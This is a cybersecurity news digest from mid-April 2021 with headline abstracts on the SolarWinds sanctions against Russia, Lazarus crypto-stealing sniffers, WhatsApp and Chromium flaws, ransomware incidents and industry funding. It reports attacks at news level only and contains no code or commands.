Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to Group-IB.Careers Info Security
April 16, 2021 – General
Consumers worry about the cybersecurity of connected vehicles Full Text
Abstract
The HSB poll by Zogby Analytics found that 37 percent of consumers who responded were somewhat or very concerned about the cyber security and safety of connected and automated vehicles.Help Net Security
April 16, 2021 – Botnet
Mirai code re-use in Gafgyt Full Text
Abstract
Uptycs' threat research team recently detected several variants of the Linux-based botnet malware family, “Gafgyt,”some of them re-used Mirai code. Uptycs' threat research team recently detected several variants of the Linux-based botnet malware...Security Affairs
April 16, 2021 – Vulnerabilities
Severe Bugs Reported in EtherNet/IP Stack for Industrial Systems Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) Thursday issued an advisory warning of multiple vulnerabilities in the OpENer EtherNet/IP stack that could expose industrial systems to denial-of-service (DoS) attacks, data leaks, and remote code execution. All OpENer commits and versions prior to February 10, 2021, are affected, although there are no known public exploits that specifically target these vulnerabilities. The four security flaws were discovered and reported to CISA by researchers Tal Keren and Sharon Brizinov from operational technology security company Claroty. Additionally, a fifth security issue identified by Claroty was previously disclosed by Cisco Talos ( CVE-2020-13556 ) on December 2, 2020. "An attacker would only need to send crafted ENIP/CIP packets to the device in order to exploit these vulnerabilities," the researchers said . CVE-2020-13556 concerns an out-of-bounds write vulnerability in the Ethernet/IP server that couldThe Hacker News
April 16, 2021 – Covid-19
Update: The COVID-19 Vaccine’s Global Cold Chain Continues to Be a Target Full Text
Abstract
The expanded scope of precision targeting includes key organizations likely underpinning the transport, warehousing, storage, and ultimate distribution of vaccines, according to IBM Security X-Force.Security Intelligence
April 16, 2021 – Hacker
Trickbot Actors Target Slack and BaseCamp Users Full Text
Abstract
Customized scam messages designed to deploy malware loaderInfosecurity Magazine
April 16, 2021 – Malware
HackBoss malware poses as hacker tools on Telegram to steal digital coins Full Text
Abstract
The authors of a cryptocurrency-stealing malware are distributing it over Telegram to aspiring cybercriminals under the guise of free malicious applications.BleepingComputer
April 16, 2021 – Malware
Lazarus BTC Changer. Back in action with JS sniffers redesigned to steal crypto Full Text
Abstract
Group-IB observed the North Korea-linked Lazarus APT group stealing cryptocurrency using a never-before-seen tool. In the last five years, JavaScript sniffers have grown into one of the most dangerous threats for e-commerce businesses. The simple...Security Affairs
April 15, 2021 – Phishing
Celsius email system breach leads to phishing attack on customers Full Text
Abstract
Cryptocurrency rewards platform Celsius Network has disclosed a security breach exposing customer information that led to a phishing attack.BleepingComputer
April 15, 2021 – Criminals
EtterSilent Maldoc Builder - The Hot Selling Cake in Underground Forums Full Text
Abstract
According to Intel 471, some cybercriminal groups are leveraging Ettersilent maldoc builder to bypass Windows Defender, Windows AMSI, and top email services including Gmail.Cyware Alerts - Hacker News
April 15, 2021 – General
Hillicon Valley: Biden administration sanctions Russia for SolarWinds hack, election interference Full Text
Abstract
The Biden administration on Thursday levied sweeping sanctions against Russia in retaliation for its involvement in the SolarWinds hack and interfering in U.S. elections, which lawmakers hailed as a positive step, but will likely serve to increase tensions between the two nations.The Hill
April 15, 2021 – Government
US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack Full Text
Abstract
The U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with "high confidence" to government operatives working for Russia's Foreign Intelligence Service (SVR). "Russia's pattern of malign behaviour around the world – whether in cyberspace, in election interference or in the aggressive operations of their intelligence services – demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security," the U.K. government said in a statement. To that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for "undermining the conduct of free and fair elections and democratic institutions" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services. The comThe Hacker News
April 15, 2021 – Policy and Law
US Imprisons “Sadistic” Sextortionist Full Text
Abstract
Cyberstalker who threatened to kill teenage victim if they didn’t have sex with him gets custodial sentenceInfosecurity Magazine
April 15, 2021 – Government
Sanctioning Russia for SolarWinds: What Normative Line Did Russia Cross? Full Text
Abstract
The United States has just sanctioned various Russian entities in express response to the SolarWinds Orion exploit campaign. But what normative line, if any, is the U.S. saying that Russia crossed?Lawfare
April 15, 2021 – Government
US Gov sanctions Russia and expels 10 diplomats over SolarWinds hack Full Text
Abstract
The U.S. and UK attributed with "high confidence" the recently disclosed supply chain attack on SolarWinds to Russia's Foreign Intelligence Service (SVR). The U.S. and U.K. attributed with "high confidence" the supply chain attack on SolarWinds to operatives...Security Affairs
April 15, 2021 – Business
Hack The Box looks to expand in America, add new functions to ‘hacking experiences’ suite Full Text
Abstract
Today, Hack The Box has 90 employees across the globe and the U.S. team makes up 10% of the global workforce – a number the company intends to double in the U.S. by end-of-year. While the location for the U.S. office has not been confirmed, the company aims for the office to create a strong base for its U.S. business operations.SCMagazine
April 15, 2021 – Government
Biden Races to Shore Up Power Grid Against Hacks Full Text
Abstract
A 100-day race to boost cybersecurity will rely on incentives rather than regulation, the White House said.Threatpost
April 15, 2021 – Business
Mozilla drops Firefox support on Amazon Fire TV Full Text
Abstract
This month, Amazon has announced plans to phase out support for the Mozilla Firefox web browser app on its Fire TV product line. The company has decided to no longer support the Mozilla Firefox browser in a bid to promote its Amazon Silk web browser app to customers, effective at the end of this month.BleepingComputer
April 15, 2021 – Phishing
Key Characteristics and Geographic Associations of Phishing Emails Full Text
Abstract
An analysis by Barracuda and Columbia University revealed that the majority of phishing emails originate from countries in Eastern Europe, Central America, the Middle East, and Africa.Cyware Alerts - Hacker News
April 15, 2021 – Government
Intelligence leaders face sharp questions during House worldwide threats hearing Full Text
Abstract
The nation's top intelligence leaders faced sharper political questions during a House hearing on global security threats, with lawmakers as focused on rehashing issues from the Trump era as future threats.The Hill
April 15, 2021 – Government
Sanctions Escalate US–Russia Tensions Full Text
Abstract
Russia hints at confrontation after being sanctioned by US for hacking and election interferenceInfosecurity Magazine
April 15, 2021 – Criminals
Cyber thieves move $760 million stolen in the 2016 Bitfinex heist Full Text
Abstract
Over $760 million worth of Bitcoin that were stolen from cryptocurrency exchange Bitfinex in 2016 were moved to new accounts. More than $760 million worth of Bitcoin, stolen from Asian cryptocurrency exchange Bitfinex in 2016, were moved on Wednesday...Security Affairs
April 15, 2021 – Vulnerabilities
What to do when a bug bounty request sounds more like extortion Full Text
Abstract
Experts advise? Try to force the gray hat researcher into a prisoner’s dilemma.SCMagazine
April 15, 2021 – Government
US government confirms Russian SVR behind the SolarWinds hack Full Text
Abstract
The United States government is formally accusing the Russian government of the SolarWinds supply-chain attack that gave hackers access to the network of multiple U.S. agencies and private tech sector companies.BleepingComputer
April 15, 2021 – Ransomware
The Tale of a New Ransomware Cartel Full Text
Abstract
Though it's normal for victims to remain unaware of how their stolen data is being put to use by cybercriminals, there's are gangs in ransomware cartels who have made millions of dollars exploiting stolen data.Cyware Alerts - Hacker News
April 15, 2021 – Government
New US sanctions further chill Biden-Putin relations Full Text
Abstract
The U.S. and Russia entered a new phase of heightened tensions Thursday after President Biden announced punishing sanctions over cyberattacks, election interference and threats against U.S. soldiers in Afghanistan.The Hill
April 15, 2021 – Policy and Law
Arrest Made Over California City Data Breach Full Text
Abstract
One Huntington Park financial official arrested and others placed on leave following data breachInfosecurity Magazine
April 15, 2021 – Privacy
Should NSA monitor your networks? Director Nakasone says no, ‘I’m not seeking legal authorities’ Full Text
Abstract
At a pair of hearings on Wednesday and Thursday, the National Security Agency and U.S. Cyber Command director again pushed back against a brewing Senate plan for the NSA to monitor domestic networks for foreign hackers.SCMagazine
April 15, 2021 – Vulnerabilities
NSA: Top 5 vulnerabilities actively abused by Russian govt hackers Full Text
Abstract
A joint advisory from the U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) warn that the Russian Foreign Intelligence Service (SVR) is exploiting five vulnerabilities in attacks against U.S. organizations and interests.BleepingComputer
April 15, 2021 – Criminals
Cyber thieves move $760 million stolen in the 2016 Bitfinex heist Full Text
Abstract
On August 2016, the Asian Bitfinex suffered a security breach that resulted in the theft of 120,000 Bitcoin, the incident had serious repercussions on the Bitcoin value that significantly dropped after the security breach (-20% decrease).Security Affairs
April 15, 2021 – Outage
Uni of Hertfordshire Suffers Cyber-Attack That Takes Down its Entire IT Network Full Text
Abstract
The attack has led to online classes being cancelledInfosecurity Magazine
April 15, 2021 – Government
As US takes sweeping action against Russia for years of hacking, industry skeptical of impact Full Text
Abstract
Anticipated for months, the Biden administration unveiled a sweeping set of sanctions and other actions against the Russian government, as well as private individuals and a number of Russian tech and defense companies. While applauded in cyber circles, some remain skeptical that the efforts will deter Moscow’s cyberespionage efforts.SCMagazine
April 15, 2021 – Business
Cybersecurity VC Funding Hit Record in 2020 With $7.8 Billion Invested Full Text
Abstract
Despite the coronavirus pandemic, 2020 was a record year in terms of venture capital funding for cybersecurity companies, with more than $7.8 billion invested, according to a new report from business information platform Crunchbase.Security Week
April 15, 2021 – Vulnerabilities
Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Credential Harvesting Full Text
Abstract
Six days after installing the webshell, the actor used the installed webshell to run PowerShell commands to gather information from the local server and the Active Directory and stole credentials from the compromised Exchange server.Palo Alto Networks
April 15, 2021 – Vulnerabilities
Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks Full Text
Abstract
The NSA, the CISA, and the FBI jointly released a Cybersecurity Advisory, “Russian SVR Targets U.S. and Allied Networks,” today to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities.FBI
April 15, 2021 – Hacker
Lazarus E-Commerce Attackers Also Targeted Cryptocurrency Full Text
Abstract
Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to the cybersecurity firm Group-IB.Gov Info Security
April 15, 2021 – Attack
A Casino Gets Hacked Through a Fish-Tank Thermometer Full Text
Abstract
That was the lesson learned a few years ago from the operators of a North American casino. According to a 2018 Business Insider report, cybersecurity executive Nicole Eagan of security firm Darktrace told the story while addressing a conference.Entrepreneur
April 15, 2021 – Government
Biden administration sanctions Russia for SolarWinds hack, election interference Full Text
Abstract
The Biden administration on Thursday announced sanctions against Russia for its involvement in a recent major cyber espionage operation against the U.S., foreign influence operations around U.S. elections, and other concerns.The Hill
April 15, 2021 – Hacker
Attackers Target ProxyLogon Exploit to Install Cryptojacker Full Text
Abstract
Threat actors targeted compromised Exchange servers to host malicious Monero cryptominer in an “unusual attack,” Sophos researchers discovered.Threatpost
April 15, 2021 – Vulnerabilities
Siemens Releases Several Advisories for ‘NAME:WRECK’ Vulnerabilities Full Text
Abstract
Siemens released a total of 14 new advisories on Tuesday, including five describing the impact and remediations for the NAME:WRECK vulnerabilities disclosed on the same day.Security Week
April 15, 2021 – Attack
University of Hertfordshire hit by cyberattack Full Text
Abstract
The University of Hertfordshire was targetted by a cyberattack which resulted in the universities entire IT network being taken down, as well as all access to cloud-based services being blocked.IT Security Guru
April 15, 2021 – Business
Cado Security locks in $10M for its cloud-native digital forensics platform Full Text
Abstract
The funding for London-based Cado is being led by Blossom Capital, with existing investors Ten Eleven Ventures also participating, among others. As another signal of demand, this Series A is coming only six months after Cado raised its seed round.TechCrunch
April 15, 2021 – Vulnerabilities
Another Critical Vulnerability Patched in SAP Commerce Full Text
Abstract
SAP announced the release of 14 new security notes and 5 updates to previously released notes. The only new Hot News note released with this round of patches addresses a critical vulnerability in SAP Commerce.Security Week
April 15, 2021 – Denial Of Service
Hundreds of Thousands of Spam Emails Flood LinkedIn Users’ Inboxes Full Text
Abstract
Users of the employment-oriented online service are being targeted with an assortment of phishing emails and scams in an attempt to hijack their LinkedIn accounts or promote fake LinkedIn email leads.Bitdefender
April 15, 2021 – Vulnerabilities
For the second time in a week, a Google Chromium zero-day released online Full Text
Abstract
A new Chromium zero-day remote code execution exploit has been released on Twitter this week, kile the previous one that affects current versions of Google Chrome, Microsoft Edge, and likely other Chromium-based browsers.Security Affairs
April 15, 2021 – Policy and Law
Republican lawmakers reintroduce bill to ban TikTok on federal devices Full Text
Abstract
Sen. Josh Hawley (R-Mo.) led a group of Senate Republicans on Thursday in reintroducing legislation to ban the use of social media app TikTok on federal government devices, citing potential national security concerns.The Hill
April 15, 2021 – Vulnerabilities
1-Click Hack Found in Popular Desktop Apps — Check If You’re Using Them Full Text
Abstract
Multiple one-click vulnerabilities have been discovered across a variety of popular software applications, allowing an attacker to potentially execute arbitrary code on target systems. The issues were discovered by Positive Security researchers Fabian Bräunlein and Lukas Euler and affect apps like Telegram, Nextcloud, VLC, LibreOffice, OpenOffice, Bitcoin/Dogecoin Wallets, Wireshark, and Mumble. "Desktop applications which pass user supplied URLs to be opened by the operating system are frequently vulnerable to code execution with user interaction," the researchers said . "Code execution can be achieved either when a URL pointing to a malicious executable (.desktop, .jar, .exe, …) hosted on an internet accessible file share (nfs, webdav, smb, …) is opened, or an additional vulnerability in the opened application's URI handler is exploited." Put differently; the flaws stem from an insufficient validation of URL input that, when opened with the help of the uThe Hacker News
April 15, 2021 – Vulnerabilities
April 2021 Security Patch Day fixes a critical flaw in SAP Commerce Full Text
Abstract
April 2021 Security Patch Day includes 14 new security notes and 5 updates to previously released notes, one of them fixes a critical issue in SAP Commerce. April 2021 Security Patch Day includes 14 new security notes and 5 updates to previously released...Security Affairs
April 15, 2021 – Government
Months after hack, US poised to announce sanctions on Russia Full Text
Abstract
The Biden administration is preparing to announce sanctions and the expulsion of diplomats from the U.S. in response to a massive Russian hacking campaign that breached vital federal agencies, as well as for election interference.AP News
April 15, 2021 – Malware
Malware Variants: More Sophisticated, Prevalent and Evolving in 2021 Full Text
Abstract
A malicious program intended to cause havoc with IT systems—malware—is becoming more and more sophisticated every year. The year 2021 is no exception, as recent trends indicate that several new variants of malware are making their way into the world of cybersecurity. While smarter security solutions are popping up, modern malware still eludes and challenges cybersecurity experts. The evolution of malware has infected everything from personal computers to industrial units since the 70s. Cybersecurity firm FireEye's network was attacked in 2020 by hackers with the most sophisticated form of hacking i.e., supply chain. This hacking team demonstrated world-class capabilities to disregard security tools and forensic examination, proving that anybody can be hacked. Also, the year 2021 is already witnessing a bump in COVID-19 vaccine-related phishing attacks . Let's take a look at the trends that forecast an increase in malware attacks: COVID-19 and Work-from-Home (WFH)The Hacker News
April 15, 2021 – Breach
Indian Supply-Chain Giant Bizongo Exposed 643GB of Sensitive Data Full Text
Abstract
Bizongo, an online packaging marketplace has suffered a data leak in which the company left highly sensitive customer information unsecured and potentially exposed to hackers and other malicious individuals.Hackread
April 15, 2021 – Breach
ParkMobile Breach Leaves 21M User Data Exposed Full Text
Abstract
The account information of 21 million customers of ParkMobile, a very popular mobile parking app from North America, is now being sold online due to a data breach. The information includes a whole range of sensitive details including phone numbers.Heimdal Security
April 15, 2021 – Policy and Law
Europe’s Data Protection Guardians Green Light EU-UK Data Flows Full Text
Abstract
EDPB recommends accepting Commission’s adequacy decisionsInfosecurity Magazine
April 15, 2021 – Criminals
YIKES! Cybercriminals flood the Internet with 100,00 malicious PDF documents Full Text
Abstract
Cybercriminals are resorting to search engine poisoning techniques to lure business professionals into seemingly legitimate Google sites that install a Remote Access Trojan (RAT) capable of carrying out a wide range of attacks. The attack works by leveraging searches for business forms such as invoices, templates, questionnaires, and receipts as a stepping stone toward infiltrating the systems. Users attempting to download the alleged document templates are redirected , without their knowledge, to a malicious website that hosts the malware. "Once the RAT is on the victim's computer and activated, the threat actors can send commands and upload additional malware to the infected system, such as ransomware, a credential stealer, a banking trojan, or simply use the RAT as a foothold into the victim's network," researchers from eSentire said in a write-up published on Tuesday. The cybersecurity firm said it discovered over 100,000 unique web pages that contain popThe Hacker News
April 15, 2021 – Policy and Law
Man Gets 10 Years for Multimillion-Dollar Medicare Fraud Scheme Full Text
Abstract
Complex conspiracy involved doctors, labs and telemarketing firmInfosecurity Magazine
April 15, 2021 – Hacker
Global Attacker Dwell Time Drops to Just 24 Days Full Text
Abstract
Ransomware spike and better threat detection play a partInfosecurity Magazine
April 15, 2021 – Vulnerabilities
Critical WhatsApp Flaw Let Attackers Hack the Victim Device Remotely Full Text
Abstract
CENSUS identified two vulnerabilities in the popular WhatsApp messenger app for Android. The first of these was independently reported to Facebook and was...Cyber Security News
April 15, 2021 – General
Well-funded, organized attacks require strategic counter-defense strategies Full Text
Abstract
The adversary is well funded, persistent, and highly technical; therefore, it is important for security leaders to accept that there’s no one vendor or technology that can defend against supply chain attacks.Cyberscoop
April 15, 2021 – General
CISOs Must Focus on People and Technologies Amid Rising Attacks Full Text
Abstract
How should CISOs respond to increased attacks in the past year?Infosecurity Magazine
April 15, 2021 – Vulnerabilities
For the second time in a week, a Google Chromium zero-day released online Full Text
Abstract
For the second time in a week, a Chromium zero-day remote code execution exploit code has been released on Twitter, multiple browsers impacted. A new Chromium zero-day remote code execution exploit has been released on Twitter this week, kile the previous...Security Affairs
April 15, 2021 – Government
Victorian government earmarks AU$30m to lift hospital cyber capabilities Full Text
Abstract
The Victorian government plans to invest a total of AU$30 million to upgrade and modernize the IT infrastructure of 28 of the state's hospitals and health services in a bid to guard against further cyber-attacks.ZDNet
April 15, 2021 – Attack
NBA’s Houston Rockets probing cyber attack, working closely with FBI Full Text
Abstract
The Houston Rockets are investigating a cyber attack that attempted to install ransomware on the basketball team’s internal systems, and the organization is working closely with the FBI, team officials said.Reuters
April 15, 2021 – Government
CISA Urges Caution for Security Researchers Targeted in Attack Campaign Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) is cautioning cybersecurity researchers to keep their guard up amid a wave of attacks targeting this particular group.Dark Reading
April 14, 2021 – General
Hillicon Valley: Intel leaders push for breach notification law | Coinbase goes public Full Text
Abstract
Key U.S. intelligence leaders on Wednesday called on Congress to pass breach notification laws in the wake of major cybersecurity incidents. Meanwhile, Ireland’s privacy agency launched an investigation into a Facebook data leak, and two leading House Republicans raised concerns about new Chinese tech companies posing a threat to national security.The Hill
April 14, 2021 – General
The DoJ’s Microsoft mitigation: Real results, with a few hypothetical concerns Full Text
Abstract
The move is being hailed as a landmark use of a new authority. But some in the cybersecurity community point to a lack of any clear standard for when and how government may hack private systems.SCMagazine
April 14, 2021 – Vulnerabilities
Security Bug Allows Attackers to Brick Kubernetes Clusters Full Text
Abstract
The vulnerability is triggered when a cloud container pulls a malicious image from a registry.Threatpost
April 14, 2021 – Government
House Republicans raise concerns about new Chinese tech companies Full Text
Abstract
Two leading Republicans on the House Homeland Security Committee on Wednesday raised concerns about security and privacy threats posed by emerging Chinese tech companies, specifically zeroing in on electronics group Xiaomi.The Hill
April 14, 2021 – Vulnerabilities
WhatsApp flaws could have allowed hackers to remotely hack mobile devices Full Text
Abstract
WhatsApp addressed two security vulnerabilities in its app for Android that could have been exploited to remotely hack the victim's device. WhatsApp recently addressed two security vulnerabilities in its app for Android that could have been exploited...Security Affairs
April 14, 2021 – Business
Led by cloud, cyber funding dollars flowed like water in 2020 Full Text
Abstract
2020 brought with it record levels of investment, with a combined $7.8 billion poured into cybersecurity startups. 2021 is shaping up even better, with some predicting $15 billion in investments by year end.SCMagazine
April 14, 2021 – Privacy
Intelligence leaders push for mandatory breach notification law Full Text
Abstract
The leaders of the nation’s intelligence agencies on Wednesday joined bipartisan members of the Senate Intelligence Committee in pushing for measures to encourage the private sector to report breaches and to deter malicious hackers from attacking critical infrastructure.The Hill
April 14, 2021 – Education
No more snack attacks? Mondelez hopes new security training will prevent the next ‘NotPetya’ Full Text
Abstract
Sure, APT attacks can be destructive and even deadly, but denying the world their Oreo cookies is just plain cruel. Indeed, Nikolay Betov, information security officer at Mondelez, told SC media that the event “changed everything.”SCMagazine
April 14, 2021 – Ransomware
Ransomware Attack Creates Cheese Shortages in Netherlands Full Text
Abstract
Not a Gouda situation: An attack on a logistics firm is suspected to be related to Microsoft Exchange server flaw.Threatpost
April 14, 2021 – Attack
New Jersey School Districts Investigate Cyber-Attacks Full Text
Abstract
Two Somerset County school districts suspect they were targeted by cyber-criminalsInfosecurity Magazine
April 14, 2021 – Vulnerabilities
SAP fixes critical bugs in Business Client, Commerce, and NetWeaver Full Text
Abstract
SAP's security updates for this month address multiple critical vulnerabilities. The most serious of them, rated with the highest severity score, affects the company's Business Client product.BleepingComputer
April 14, 2021 – General
Aviation Industry Lacks Cohesive Cybersecurity Approach Full Text
Abstract
World Economic Forum study calls for unified cybersecurity strategy in aviation sectorInfosecurity Magazine
April 14, 2021 – Vulnerabilities
Second Google Chrome zero-day exploit dropped on twitter this week Full Text
Abstract
A second Chromium zero-day remote code execution exploit has been released on Twitter this week that affects current versions of Google Chrome, Microsoft Edge, and likely other Chromium-based browsers.BleepingComputer
April 14, 2021 – Policy and Law
Lawsuit Filed After Facial Recognition Tech Leads to Wrongful Arrest Full Text
Abstract
American sues Detroit officials over wrongful arrest linked to facial recognition technologyInfosecurity Magazine
April 14, 2021 – General
Intelligence leaders warn of threats from China, domestic terrorism Full Text
Abstract
Intelligence leaders warned Wednesday of growing threats from China and domestic terrorism fueled by misinformation on social media at a hearing on worldwide threats to the nation.The Hill
April 14, 2021 – Vulnerabilities
Critical Exchange Server Vulnerabilities let Attackers Execute Remote Code Full Text
Abstract
Microsoft has released security updates for vulnerabilities found in the below versions of Exchange servers on the 13th April 2021 which is...Cyber Security News
April 14, 2021 – IOT
‘Digital exhaust’ may be the solution for tracking consumer IoT devices on networks Full Text
Abstract
A technique known as radio frequency (RF) fingerprinting could be leveraged to give unique ID to the billions of rogue IoT devices lurking within home and business networks.SCMagazine
April 14, 2021 – Privacy
Vivaldi, Brave, DuckDuckGo reject Google’s FLoC ad tracking tech Full Text
Abstract
Makers of Vivaldi and Brave web browsers have rejected Google's new privacy-preserving proposal called FLoC, which is meant to replace third-party tracking cookies across websites on browsers, including Chrome.BleepingComputer
April 14, 2021 – Vulnerabilities
Reddit takes bug bounty program public Full Text
Abstract
Reddit announced Wednesday that it is taking its bug bounty program public. The popular social news site and community forum platform has run a private program with HackerOne for the past three years, but hopes that by going public, it can more quickly address vulnerabilities, improve its defenses and keep the platform secure. “We’ve seen…SCMagazine
April 14, 2021 – Government
Wray: FBI opens investigation into China every 10 hours Full Text
Abstract
FBI Director Christopher Wray told Senate Intelligence Committee members on Wednesday that the agency is opening an investigation into various Chinese government actions every 10 hours.The Hill
April 14, 2021 – Vulnerabilities
100 Million+ Devices Affected With Critical WRECK DNS Implementation Flaws Full Text
Abstract
JSOF team together with Forescout Research Labs, have revealed a set of nine vulnerabilities related to Domain Name System (DNS) implementations, causing...Cyber Security News
April 14, 2021 – Government
Bolstering Our Nation’s Defenses Against Cybersecurity Attacks Full Text
Abstract
Shawn Henry, former Executive Assistant Director of the FBI and current CrowdStrike president of services and CSO, shares the top three cybersecurity priorities that the Biden administration needs to address.Dark Reading
April 14, 2021 – Vulnerabilities
New WhatsApp Bugs Could’ve Let Attackers Hack Your Phone Remotely Full Text
Abstract
Facebook-owned WhatsApp recently addressed two security vulnerabilities in its messaging app for Android that could have been exploited to execute malicious code remotely on the device and even compromise encrypted communications. The flaws take aim at devices running Android versions up to and including Android 9 by carrying out what's known as a "man-in-the-disk" attack that makes it possible for adversaries to compromise an app by manipulating certain data being exchanged between it and the external storage. "The two aforementioned WhatsApp vulnerabilities would have made it possible for attackers to remotely collect TLS cryptographic material for TLS 1.3 and TLS 1.2 sessions," researchers from Census Labs said today. "With the TLS secrets at hand, we will demonstrate how a man-in-the-middle (MitM) attack can lead to the compromise of WhatsApp communications, to remote code execution on the victim device and to the extraction of Noise protocol keyThe Hacker News
April 14, 2021 – Business
Thycotic and Centrify Complete Merger to Expand PAM Offerings Full Text
Abstract
The newly merged company will operate under the temporary name of ThycoticCentrifyInfosecurity Magazine
April 14, 2021 – Hacker
FireEye: 650 new threat groups were tracked in 2020 Full Text
Abstract
FireEye published its M-Trend 2021 report based on the data collected during the investigation, 650 new threat groups were tracked in 2020 FireEye published its annual report, titled M-Trend 2021, which is based on the data collected during the investigation...Security Affairs
April 14, 2021 – General
On first-ever Identity Management Day, experts detail steps to a better IAM program Full Text
Abstract
Establishing a governance structure and communicating with stakeholders are key strategies, said experts.SCMagazine
April 14, 2021 – Vulnerabilities
WhatsApp flaw lets anyone lock you out of your account Full Text
Abstract
The underlying loophole abuses a lapse in security of two independent WhatsApp processes, according to Forbes, which quoted research by Luis Márquez Carpintero and Ernesto Canales Pereña.ESET Security
April 14, 2021 – Vulnerabilities
New JavaScript Exploit Can Now Carry Out DDR4 Rowhammer Attacks Full Text
Abstract
Academics from Vrije University in Amsterdam and ETH Zurich have published a new research paper describing yet another variation of the Rowhammer attack. Dubbed SMASH (Synchronized MAny-Sided Hammering), the technique can be used to successfully trigger the attack from JavaScript on modern DDR4 RAM cards, notwithstanding extensive mitigations that have been put in place by manufacturers over the last seven years. "Despite their in-DRAM Target Row Refresh (TRR) mitigations, some of the most recent DDR4 modules are still vulnerable to many-sided Rowhammer bit flips," the researchers said. "SMASH exploits high-level knowledge of cache replacement policies to generate optimal access patterns for eviction-based many-sided Rowhammer. To bypass the in-DRAM TRR mitigations, SMASH carefully schedules cache hits and misses to successfully trigger synchronized many-sided Rowhammer bit flips." By synchronizing memory requests with DRAM refresh commands, the researchersThe Hacker News
April 14, 2021 – Covid-19
Bad Bots Could Disrupt #COVID19 Vaccine Rollout Full Text
Abstract
Scalper bots have already been cashing-in on the pandemicInfosecurity Magazine
April 14, 2021 – Government
FBI silently removed web shells planted on Microsoft Exchange servers in the US Full Text
Abstract
FBI log into web shells that hackers installed on Microsoft Exchange email servers across the US and removed the malicious code used by threat actors. A US judge granted the FBI the power to log into web shells that were injected by nation-state hackers...Security Affairs
April 14, 2021 – Malware
QBot Malware Is Making a Comeback by Replacing IcedID in Malspam Campaigns Full Text
Abstract
In the first months of the year, researchers noticed a malicious email campaign spreading weaponized Office documents that was delivering QBot trojan, and changing the payload after a short while.Heimdal Security
April 14, 2021 – Vulnerabilities
New Vulnerability Affecting Container Engines CRI-O and Podman (CVE-2021-20291) Full Text
Abstract
Palo Alto Networks researchers have found CVE-2021-20291 in containers/storage that leads to a Denial of Service (DoS) of the container engines CRI-O and Podman when pulling a malicious image from a registry.Palo Alto Networks
April 14, 2021 – Breach
Risk startup LogicGate confirms data breach Full Text
Abstract
An email sent by LogicGate to customers earlier this month said on February 23 an unauthorized third party obtained credentials to its AWS-hosted cloud storage servers storing customer backup files for its flagship platform Risk Cloud.TechCrunch
April 14, 2021 – Government
FBI blasts away web shells on US servers in wake of Exchange vulnerabilities Full Text
Abstract
The Department of Justice revealed on Tuesday that the FBI gained authorization to remove web shells installed on compromised servers related to the Exchange vulnerabilities.ZDNet
April 14, 2021 – Solution
Microsoft Released CyberBattleSim – A Python-based Enterprise Environment Simulator Full Text
Abstract
Microsoft has recently announced the open-source availability of the Python-based enterprise environment simulator named ‘CyberBattleSim’. It is an experimental...Cyber Security News
April 14, 2021 – Malware
Cracked copies of Microsoft Office and Adobe Photoshop steal your session cookies, browser history, crypto-coins Full Text
Abstract
Cracked copies of Microsoft Office and Adobe Photoshop are stealing browser session cookies and Monero cryptocurrency wallets from tightwads who install the pirated software, Bitdefender has warned.The Register
April 14, 2021 – General
Simplify, then Add Lightness – Consolidating the Technology to Better Defend Ourselves Full Text
Abstract
One of the biggest consequences of the rapidly evolving cybersecurity threat landscape is that defenses must constantly build bigger systems to defend themselves. This leads to both more complex systems and often less communication between them. More importantly, it can lead companies to invest in disparate "best in class" components instead of finding the best fit for their needs. The constant arms race means that companies often get bigger, more powerful tools that can't handle the nuanced threats they face. For instance, in a car race, it's not often the fastest, most powerful car that wins, but the one that is more balanced, lighter, and more able to turn and react when needed. In a new live webinar, Cynet Chief Strategist Chris Roberts breaks down why the philosophy of "simpler is better" is just what cybersecurity needs ( register here ). The webinar will focus on how quickly cybersecurity stacks are growing and how this is not always a good thing. Companies are too focusedThe Hacker News
April 14, 2021 – Vulnerabilities
Microsoft Patches Four More Critical Exchange Server Bugs Full Text
Abstract
NSA reported the vulnerabilities as Patch Tuesday CVEs top 100Infosecurity Magazine
April 14, 2021 – Government
Sweden blames Russia for Swedish Sports Confederation hack Full Text
Abstract
The Swedish Sports Confederation organization was compromised in 2017-18 by hackers working for Russian military intelligence, officials said. The Swedish Sports Confederation is the umbrella organisation of the Swedish sports movement, it was hacked...Security Affairs
April 14, 2021 – Government
The Biden Administration’s Cybersecurity Roadmap Full Text
Abstract
The pandemic has forced state and local governments to shift so much of their operations and provision of services online, but their technology has often struggled to keep up, and even worse it has exposed their cybersecurity vulnerabilities.Nextgov
April 14, 2021 – Government
FBI Removes Web Shells from Infected Exchange Servers Full Text
Abstract
Aggressive action designed to head-off persistent security threatInfosecurity Magazine
April 14, 2021 – Business
1Password targets developers with Secrets Automation, acquisition of SecretHub Full Text
Abstract
Password specialist 1Password has acquired SecretHub, a secrets management platform aimed at IT engineers, and made a new service called Secrets Automation, previously in beta, generally available.The Register
April 14, 2021 – General
Small Kansas Water Utility System Hacking Highlights Risks Full Text
Abstract
A former Kansas utility worker has been charged with remotely tampering with a public water system’s cleaning procedures, highlighting the difficulty smaller utilities face in protecting against hackers.Security Week
April 14, 2021 – Vulnerabilities
Adobe Patches Critical Code Execution Vulnerabilities in Photoshop, Bridge Full Text
Abstract
Adobe on Tuesday announced patches for several vulnerabilities in four of its products, including critical code execution and buffer flow flaws affecting Photoshop and Bridge.Security Week
April 14, 2021 – Business
SolarWinds says dealing with hack fallout cost at least $18 million Full Text
Abstract
Texas-based SolarWinds Corp said the sprawling breach stemming from the compromise of its flagship software product has cost the company at least $18 million in the first three months of 2021.Reuters
